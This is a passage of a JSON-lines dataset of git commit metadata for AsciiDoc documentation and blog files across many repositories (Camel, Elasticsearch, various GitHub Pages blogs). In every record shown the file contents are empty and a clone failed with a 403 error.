offer_year_calendar\n","repos":"uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/data-manual.adoc","new_file":"doc\/data-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a674c59b638cfcfe6814ff5b4e71c8a99da3152f","subject":"Added Zip dataformat docs to Gitbook","message":"Added Zip dataformat docs to 
Gitbook\n","repos":"objectiser\/camel,veithen\/camel,alvinkwekel\/camel,zregvart\/camel,sirlatrom\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,sabre1041\/camel,Fabryprog\/camel,christophd\/camel,anoordover\/camel,lburgazzoli\/camel,CodeSmell\/camel,acartapanis\/camel,allancth\/camel,jamesnetherton\/camel,yuruki\/camel,pax95\/camel,bgaudaen\/camel,anton-k11\/camel,davidkarlsen\/camel,ullgren\/camel,acartapanis\/camel,sverkera\/camel,tlehoux\/camel,isavin\/camel,JYBESSON\/camel,JYBESSON\/camel,davidkarlsen\/camel,JYBESSON\/camel,gnodet\/camel,nboukhed\/camel,tkopczynski\/camel,mgyongyosi\/camel,scranton\/camel,hqstevenson\/camel,veithen\/camel,nicolaferraro\/camel,tlehoux\/camel,tadayosi\/camel,yuruki\/camel,gilfernandes\/camel,dmvolod\/camel,RohanHart\/camel,yuruki\/camel,sverkera\/camel,veithen\/camel,christophd\/camel,tadayosi\/camel,acartapanis\/camel,tadayosi\/camel,ssharma\/camel,pkletsko\/camel,jkorab\/camel,JYBESSON\/camel,snurmine\/camel,objectiser\/camel,gautric\/camel,curso007\/camel,kevinearls\/camel,salikjan\/camel,nboukhed\/camel,driseley\/camel,chirino\/camel,alvinkwekel\/camel,ssharma\/camel,christophd\/camel,pmoerenhout\/camel,jonmcewen\/camel,cunningt\/camel,neoramon\/camel,pkletsko\/camel,tkopczynski\/camel,tadayosi\/camel,adessaigne\/camel,chirino\/camel,akhettar\/camel,anoordover\/camel,nikhilvibhav\/camel,isavin\/camel,pax95\/camel,kevinearls\/camel,jarst\/camel,christophd\/camel,alvinkwekel\/camel,chirino\/camel,zregvart\/camel,apache\/camel,bhaveshdt\/camel,zregvart\/camel,sabre1041\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,drsquidop\/camel,prashant2402\/camel,ssharma\/camel,dmvolod\/camel,anoordover\/camel,Thopap\/camel,cunningt\/camel,hqstevenson\/camel,pkletsko\/camel,rmarting\/camel,tadayosi\/camel,acartapanis\/camel,gnodet\/camel,driseley\/camel,snurmine\/camel,prashant2402\/camel,allancth\/camel,nicolaferraro\/camel,tdiesler\/camel,christophd\/camel,sabre1041\/camel,pkletsko\/camel,NickCis\/camel,Thopap\/camel,DariusX\/camel,akhettar\/camel,jamesnetherton\/camel,gautric\/camel,gilfernandes\/camel,jarst\/camel,anton-k11\/camel,scranton\/camel,RohanHart\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,sverkera\/camel,snurmine\/camel,drsquidop\/camel,punkhorn\/camel-upstream,driseley\/camel,w4tson\/camel,kevinearls\/camel,apache\/camel,cunningt\/camel,gautric\/camel,tlehoux\/camel,NickCis\/camel,nboukhed\/camel,objectiser\/camel,davidkarlsen\/camel,anton-k11\/camel,mgyongyosi\/camel,Fabryprog\/camel,neoramon\/camel,gilfernandes\/camel,curso007\/camel,neoramon\/camel,tdiesler\/camel,chirino\/camel,lburgazzoli\/camel,NickCis\/camel,w4tson\/camel,gilfernandes\/camel,jonmcewen\/camel,cunningt\/camel,sirlatrom\/camel,tdiesler\/camel,tdiesler\/camel,onders86\/camel,ssharma\/camel,gnodet\/camel,jkorab\/camel,w4tson\/camel,hqstevenson\/camel,bgaudaen\/camel,mgyongyosi\/camel,jarst\/camel,driseley\/camel,prashant2402\/camel,jamesnetherton\/camel,gautric\/camel,pmoerenhout\/camel,tdiesler\/camel,mgyongyosi\/camel,sverkera\/camel,CodeSmell\/camel,nicolaferraro\/camel,scranton\/camel,Thopap\/camel,bhaveshdt\/camel,isavin\/camel,hqstevenson\/camel,DariusX\/camel,onders86\/camel,nboukhed\/camel,anoordover\/camel,kevinearls\/camel,pmoerenhout\/camel,tkopczynski\/camel,anton-k11\/camel,sabre1041\/camel,onders86\/camel,dmvolod\/camel,apache\/camel,JYBESSON\/camel,pmoerenhout\/camel,akhettar\/camel,w4tson\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,DariusX\/camel,jarst\/camel,hqstevenson\/camel,DariusX\/camel,akhettar\/camel,pax95\/camel,scranton\
/camel,bhaveshdt\/camel,allancth\/camel,NickCis\/camel,bgaudaen\/camel,rmarting\/camel,ssharma\/camel,jamesnetherton\/camel,isavin\/camel,snurmine\/camel,RohanHart\/camel,ssharma\/camel,dmvolod\/camel,adessaigne\/camel,allancth\/camel,chirino\/camel,isavin\/camel,gilfernandes\/camel,allancth\/camel,anton-k11\/camel,jkorab\/camel,drsquidop\/camel,neoramon\/camel,scranton\/camel,lburgazzoli\/camel,isavin\/camel,curso007\/camel,Thopap\/camel,gnodet\/camel,RohanHart\/camel,drsquidop\/camel,RohanHart\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,jonmcewen\/camel,driseley\/camel,mcollovati\/camel,adessaigne\/camel,veithen\/camel,tlehoux\/camel,jarst\/camel,onders86\/camel,lburgazzoli\/camel,JYBESSON\/camel,curso007\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,veithen\/camel,curso007\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,sabre1041\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,rmarting\/camel,rmarting\/camel,mgyongyosi\/camel,mcollovati\/camel,jkorab\/camel,bgaudaen\/camel,allancth\/camel,cunningt\/camel,salikjan\/camel,tkopczynski\/camel,ullgren\/camel,sirlatrom\/camel,tkopczynski\/camel,veithen\/camel,alvinkwekel\/camel,gilfernandes\/camel,sirlatrom\/camel,curso007\/camel,onders86\/camel,akhettar\/camel,neoramon\/camel,lburgazzoli\/camel,acartapanis\/camel,prashant2402\/camel,prashant2402\/camel,kevinearls\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,jonmcewen\/camel,snurmine\/camel,lburgazzoli\/camel,jkorab\/camel,pkletsko\/camel,ullgren\/camel,neoramon\/camel,NickCis\/camel,kevinearls\/camel,yuruki\/camel,jonmcewen\/camel,NickCis\/camel,chirino\/camel,nboukhed\/camel,Fabryprog\/camel,jamesnetherton\/camel,gautric\/camel,jamesnetherton\/camel,pmoerenhout\/camel,drsquidop\/camel,prashant2402\/camel,dmvolod\/camel,rmarting\/camel,yuruki\/camel,zregvart\/camel,tlehoux\/camel,gautric\/camel,scranton\/camel,mcollovati\/camel,nikhilvibhav\/camel,anoordover\/camel,tdiesler\/camel,CodeSmell\/camel,bgaudaen\/camel,ullgren\/camel,w4tson\/camel,drsquidop\/camel,cunningt\/camel,Thopap\/camel,objectiser\/camel,sabre1041\/camel,bhaveshdt\/camel,tadayosi\/camel,pax95\/camel,yuruki\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,w4tson\/camel,jonmcewen\/camel,driseley\/camel,Thopap\/camel,RohanHart\/camel,apache\/camel,lburgazzoli\/apache-camel,CodeSmell\/camel,snurmine\/camel,pkletsko\/camel,jarst\/camel,nboukhed\/camel,sverkera\/camel,davidkarlsen\/camel,gnodet\/camel,bgaudaen\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,rmarting\/camel,acartapanis\/camel,tlehoux\/camel,sverkera\/camel,pax95\/camel,apache\/camel,tkopczynski\/camel,hqstevenson\/camel,christophd\/camel,onders86\/camel,adessaigne\/camel,anoordover\/camel,jkorab\/camel","old_file":"camel-core\/src\/main\/docs\/zip-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/zip-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8f95ceb21f55dd0d76acf836845ee53261fdcbb","subject":"add readme file for telegram channel","message":"add readme file for telegram channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-telegram\/README.adoc","new_file":"channels\/boteco-channel-telegram\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b6e7ff33ea2adc2b0cfe2cf40d55296032ad31c","subject":"Fixed spelling and grammar of doc file","message":"Fixed spelling and grammar of doc file","repos":"djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f75d6bc45c28f922757f55283edaaa0c2cd6054","subject":"Worked on Security Account Manager (SAM) script","message":"Worked on Security Account Manager (SAM) script\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Security Accounts Manager keys.asciidoc","new_file":"documentation\/Security Accounts Manager keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e145fe389b66f5b6b975b4149eeda2c77bc017c0","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"drools\/drools-jbpm\/readme.adoc","new_file":"drools\/drools-jbpm\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aa7795fb665d8b83c28a940c7ad2692da02592","subject":"No issue. Corrected link.","message":"No issue. 
Corrected link.\n","repos":"webanno\/webanno,webanno\/webanno,webanno\/webanno,webanno\/webanno","old_file":"webanno-doc\/src\/main\/asciidoc\/user-guide\/annotation.adoc","new_file":"webanno-doc\/src\/main\/asciidoc\/user-guide\/annotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/webanno\/webanno.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01c212216841bfc3a3e796df2a26f61e5122cbf0","subject":"Add Gitter badge","message":"Add Gitter badge","repos":"snicoll\/initializr,gwidgets\/gwt-project-generator,bclozel\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,bclozel\/initializr,spring-io\/initializr,bclozel\/initializr,Arsene07\/forge,snicoll\/initializr,Arsene07\/forge,snicoll\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,bclozel\/initializr,Arsene07\/forge,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,spring-io\/initializr,bclozel\/initializr,spring-io\/initializr,nevenc-pivotal\/initializr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fcaec4b4535ef0354d3e1e3a098a519794bd289","subject":"Create README.adoc","message":"Create README.adoc","repos":"SerCeMan\/jclouds-vsphere","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SerCeMan\/jclouds-vsphere.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d1a5488f0ec9cdc79e6e51f12117442f26c8ce0","subject":"Added a documentation section to the README","message":"Added a documentation section to the README\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b66c824ce03d53e5d09d748d01c57e50d00f71d","subject":"added readme","message":"added readme\n","repos":"gAmUssA\/microservices-refcard","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/microservices-refcard.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c0f1430e5ae7b9d1c81b18f53309c22766dc77","subject":"Update 2016-06-23-slack-book.adoc","message":"Update 2016-06-23-slack-book.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-06-23-slack-book.adoc","new_file":"_posts\/2016-06-23-slack-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3fb6b14fb5834ca8fd54d278ee10d05032aa6f0","subject":"Update 
2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"808a9852abc0a4cbcb14c1b4e7a3fc004114fd15","subject":"y2b create post YouTube Subscription Issues (Sub Box Problem)","message":"y2b create post YouTube Subscription Issues (Sub Box Problem)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-27-YouTube-Subscription-Issues-Sub-Box-Problem.adoc","new_file":"_posts\/2011-09-27-YouTube-Subscription-Issues-Sub-Box-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e1c6664bc51440a714b577d30caa2251f30aec","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2f2d8cbfab4341262dbb14d51d81d046a73860f","subject":"Update 2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ace7ce6628e6573b5dfcdcb16253e44cd98b905a","subject":"Update 2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","message":"Update 2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","repos":"ashmckenzie\/ashmckenzie.github.io,ashmckenzie\/ashmckenzie.github.io,ashmckenzie\/ashmckenzie.github.io","old_file":"_posts\/2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","new_file":"_posts\/2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashmckenzie\/ashmckenzie.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9609ddba6084b39371af056ce69059a37933456a","subject":"Fixed RUNNING.adoc","message":"Fixed RUNNING.adoc\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RUNNING.adoc","new_file":"RUNNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ab7aaef461c45087409236e60575f0835bf4f00","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f2d4faa64c3fdd0fcea7f9eef8cd3c6992fdf1","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e44c28e90ddeb4b03f0e689ecf902751e9841d","subject":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"570b3b8936bee7103d624d58355a1fd6ae46fcda","subject":"Added video about a sample debugging session","message":"Added video about a sample debugging session\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359c791af9adcdefbf4eea26a0376dc6113910ce","subject":"[Add] Blog post","message":"[Add] Blog post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"blog\/source\/blog\/2015-08-19-0.4.5.1-rc1-released\/index.adoc","new_file":"blog\/source\/blog\/2015-08-19-0.4.5.1-rc1-released\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ee8a0c265abb9c9f98cd1fc798165fc54ffb70f2","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acfe96e9c8eb056cf0a6c1edbb8c7a96e61efa81","subject":"Update 2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","message":"Update 2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","new_file":"_posts\/2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1151e63fb4dca2fe624ebbaa6777f9f3da78f3e","subject":"[DOCS] updated migrate guide with info for plugins","message":"[DOCS] updated migrate guide with info for plugins\n","repos":"areek\/elasticsearch,polyfractal\/elasticsearch,jbertouch\/elasticsearch,maddin2016\/elasticsearch,zkidkid\/elasticsearch,nrkkalyan\/elasticsearch,weipinghe\/elasticsearch,mapr\/elasticsearch,snikch\/elasticsearch,rlugojr\/elasticsearch,ESamir\/elasticsearch,pozhidaevak\/elasticsearch,drewr\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,hafkensite\/elasticsearch,myelin\/elasticsearch,cwurm\/elasticsearch,jpountz\/elasticsearch,lks21c\/elasticsearch,Rygbee\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,diendt\/elasticsearch,elasticdog\/elasticsearch,F0lha\/elasticsearch,drewr\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,caengcjd\/elasticsearch,maddin2016\/elasticsearch,socialrank\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,Collaborne\/elasticsearch,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,myelin\/elasticsearch,davidvgalbraith\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,kunallimaye\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dongjoon-hyun\/elasticsearch,dongjoon-hyun\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,ESamir\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,masterweb121\/elasticsearch,scorpionvicky\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,AndreKR\/elasticsearch,hafkensite\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,drewr\/elasti
csearch,cnfire\/elasticsearch-1,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,avikurapati\/elasticsearch,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,socialrank\/elasticsearch,alexshadow007\/elasticsearch,mmaracic\/elasticsearch,Collaborne\/elasticsearch,ricardocerq\/elasticsearch,ESamir\/elasticsearch,nrkkalyan\/elasticsearch,masterweb121\/elasticsearch,ivansun1010\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,camilojd\/elasticsearch,karthikjaps\/elasticsearch,karthikjaps\/elasticsearch,masaruh\/elasticsearch,AndreKR\/elasticsearch,schonfeld\/elasticsearch,jbertouch\/elasticsearch,Stacey-Gammon\/elasticsearch,schonfeld\/elasticsearch,C-Bish\/elasticsearch,YosuaMichael\/elasticsearch,yanjunh\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,areek\/elasticsearch,diendt\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,camilojd\/elasticsearch,clintongormley\/elasticsearch,areek\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,sdauletau\/elasticsearch,mmaracic\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,Rygbee\/elasticsearch,jeteve\/elasticsearch,brandonkearby\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,lzo\/elasticsearch-1,rajanm\/elasticsearch,xuzha\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,drewr\/elasticsearch,sreeramjayan\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,YosuaMichael\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,glefloch\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,rmuir\/elasticsearch,wbowling\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,diendt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,IanvsPoplicola\/elasticsearch,henakamaMSFT\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,jchampion\/elasticsearch,dongjoon-hyun\/elasticsearch,F0lha\/elasticsearch,dpursehouse\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,GlenRSmith\/elasticsearch,polyfractal\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,rmuir\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,lzo\/elasticsearch-1,strapdata\/elassandra5-rc,coding0011\/elasticsearch,coding0011\/elasticsearch,spiegela\/elasticsearch,mmaracic\/elasticsearch,rmuir\/elasticsearch,liweinan0423\/elasticsearch,onegambler\/elasticsearch,kaneshin\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,weipinghe\/elasticsearch,avikurapati\/elasticsearch,mikemccand\/elasticsearch,Collaborne\/elasticsearch,mapr\/elasticsearch,AndreKR\/elasticsearch,gmarz\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,sreeramjayan\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,jchampion\/elasticsearch,palecur\/elasticsearch,weipinghe\/elasticsearch,cnfire\/elasticsearch-1,iacdingping\/elasticsearch,tebriel\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,jeteve\/elasticsearch,andrestc\/elasticsearch,socialrank\/elasticsearch,sneivandt\/elasticsearch,tebriel\/elasticsearch,markharwood\/elasticsearch,masterweb121\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dpursehouse\/elasticsearch,cnfire\/elasticsearch-1,jprante\/elasticsearch,wbowling\/elasticsearch,jcha
